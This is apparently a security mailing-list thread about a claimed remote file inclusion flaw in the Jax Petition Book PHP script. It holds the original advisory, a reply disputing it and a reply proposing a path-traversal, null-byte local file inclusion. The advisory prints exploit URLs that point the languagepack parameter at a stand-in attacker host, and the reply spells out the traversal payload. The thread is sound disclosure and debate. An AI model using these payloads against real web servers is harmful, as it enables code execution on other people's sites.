Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities
Actually, this can be pretty serious depending on server settings, but an improper example was given. Better one: jax_petitionbook.php?languagepack=../../some_other_allowed_file_uploads/myfile.php.gif%00 Many servers will have magic quotes on to defeat the null byte, but by no means all. John [EMAIL PROTECTED] wrote: This is not a vulnerability. Since $languagepack is prefixed by "language/", the PHP stream handler will simply try to open a local file. Also, you can only modify $languagepack if register_globals is on, which, it rarely is these days. Can we stop with the PHP 'vulnerabilities' that aren't? -Blake Whatchu talkin' 'bout, Willis? -- AYYILDIZ.ORG PreSents... *Script: Jax Petition Book *Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip *Contact: ilker Kandemir --- *Code: require ( "language/" .$languagepack . ".inc.php" ); --- *Exploit: jax_petitionbook.php?languagepack=http://attacker.txt? smileys.php?languagepack=http://attacker.txt? --- Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci Special Tnx: AYYILDIZ.ORG
Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities
This is not a vulnerability. Since $languagepack is prefixed by "language/", the PHP stream handler will simply try to open a local file. Also, you can only modify $languagepack if register_globals is on, which, it rarely is these days. Can we stop with the PHP 'vulnerabilities' that aren't? -Blake Whatchu talkin' 'bout, Willis? > -- > > AYYILDIZ.ORG PreSents... > > > *Script: Jax Petition Book > *Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip > > *Contact: ilker Kandemir > > --- > > *Code: > > require ( "language/" .$languagepack . ".inc.php" ); > > --- > > *Exploit: > > jax_petitionbook.php?languagepack=http://attacker.txt? > smileys.php?languagepack=http://attacker.txt? > > --- > > Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci > Special Tnx: AYYILDIZ.ORG -- Blake Matheny [EMAIL PROTECTED] http://mobocracy.net pgpU9okIiKMsx.pgp Description: PGP signature
Jax Petition Book (languagepack) Remote File Include Vulnerabilities
-- AYYILDIZ.ORG PreSents... *Script: Jax Petition Book *Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip *Contact: ilker Kandemir --- *Code: require ( "language/" .$languagepack . ".inc.php" ); --- *Exploit: jax_petitionbook.php?languagepack=http://attacker.txt? smileys.php?languagepack=http://attacker.txt? --- Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum€nci Special Tnx: AYYILDIZ.ORG